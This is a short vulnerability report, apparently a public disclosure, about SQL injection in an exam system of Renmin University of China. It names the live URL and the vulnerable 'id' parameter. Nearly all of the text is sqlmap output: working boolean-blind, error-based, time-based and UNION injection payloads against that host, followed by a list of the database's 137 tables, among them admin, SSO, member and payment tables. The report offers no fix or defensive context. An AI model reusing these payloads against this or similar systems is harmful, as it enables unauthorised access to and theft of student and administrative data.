A system of Renmin University of China has the SQL injection vulnerability.

A system of Renmin University of China has the SQL injection vulnerability.

Http://labsafe.ruc.edu.cn/index.php? A = examtraining & c = index & id = 1 & m = member & type = TF
 

sqlmap resumed the following injection point(s) from stored session:---Parameter: id (GET)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: a=examtraining&c=index&id=1 AND 3246=3246&m=member&type=TF    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause    Payload: a=examtraining&c=index&id=1 AND (SELECT 2128 FROM(SELECT COUNT(*),CONCAT(0x7171706a71,(SELECT (ELT(2128=2128,1))),0x71766b7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&m=member&type=TF    Type: AND/OR time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)    Payload: a=examtraining&c=index&id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))RsRR)&m=member&type=TF    Type: UNION query    Title: Generic UNION query (NULL) - 6 columns    Payload: a=examtraining&c=index&id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x7171706a71,0x587a5348674c45726b68,0x71766b7071),NULL,NULL,NULL-- &m=member&type=TF---back-end DBMS: MySQL 5.0Database: exam[137 tables]+---------------------------+| answers                   || answers_copy              || colleges                  || ea_roles_permissions      || ea_user_roles             || ea_users                  || exam_schedules            || exam_templates            || examinations              || gen_ids                   || jiaoda_admin              || jiaoda_admin_panel        || jiaoda_admin_role         || jiaoda_admin_role_priv    || jiaoda_announce           || jiaoda_attachment         || jiaoda_attachment_index   || jiaoda_badword            || jiaoda_block              || jiaoda_block_history      || jiaoda_block_priv         || jiaoda_cache              || jiaoda_category           || jiaoda_category_priv      || jiaoda_collection_content || jiaoda_collection_history || jiaoda_collection_node    || jiaoda_collection_program || jiaoda_colleges           || jiaoda_comment            || jiaoda_comment_check      || jiaoda_comment_data_1     || jiaoda_comment_setting    || jiaoda_comment_table      || jiaoda_content_check      || jiaoda_copyfrom           || jiaoda_datacall           || jiaoda_dbsource           || jiaoda_downservers        || jiaoda_extend_setting     || jiaoda_favorite           || jiaoda_form_yijian        || jiaoda_hits               || jiaoda_ipbanned           || jiaoda_keylink            || jiaoda_keyword            || jiaoda_keyword_data       || jiaoda_link               || jiaoda_linkage            || jiaoda_log                || jiaoda_majors             || jiaoda_member             || jiaoda_member_detail      || jiaoda_member_exam        || jiaoda_member_group       || jiaoda_member_menu        || jiaoda_member_student     || jiaoda_member_study       || jiaoda_member_verify      || jiaoda_member_vip         || jiaoda_member_yijian      || jiaoda_menu               || jiaoda_message            || jiaoda_message_data       || jiaoda_message_group      || jiaoda_model              || jiaoda_model_field        || jiaoda_module             || jiaoda_mood               || jiaoda_must_study         || jiaoda_must_study_data    || jiaoda_news               || jiaoda_news_data          || jiaoda_page               || jiaoda_pay_account        || jiaoda_pay_payment        || jiaoda_pay_spend          || jiaoda_position           || jiaoda_position_data      || jiaoda_poster             || jiaoda_poster_201404      || jiaoda_poster_201412      || jiaoda_poster_201501      || jiaoda_poster_201503      || jiaoda_poster_201504      || jiaoda_poster_201508      || jiaoda_poster_space       || jiaoda_queue              || jiaoda_release_point      || jiaoda_safe_info          || jiaoda_safe_info_data     || jiaoda_search             || jiaoda_search_keyword     || jiaoda_session            || jiaoda_site               || jiaoda_sms_report         || jiaoda_special            || jiaoda_special_c_data     || jiaoda_special_content    || jiaoda_sphinx_counter     || jiaoda_sso_admin          || jiaoda_sso_applications   || jiaoda_sso_members        || jiaoda_sso_messagequeue   || jiaoda_sso_session        || jiaoda_sso_settings       || jiaoda_tag                || jiaoda_template_bak       || jiaoda_times              || jiaoda_type               || jiaoda_urlrule            || jiaoda_video_content      || jiaoda_video_store        || jiaoda_vote_data          || jiaoda_vote_option        || jiaoda_vote_subject       || jiaoda_wap                || jiaoda_wap_type           || jiaoda_workflow           || major_store_rel           || must_choose_defs          || options                   || paper_questions           || papers                    || ques_stores               || questions                 || schedule_majors           || store_push_settings       || temp_ques_defs            || v_exam_question_answers   || v_examination             || v_examination_notpass     || v_examination_notpass_ids || v_examination_pass        || v_examination_pass_ids    || v_examination_passrate    || v_schedules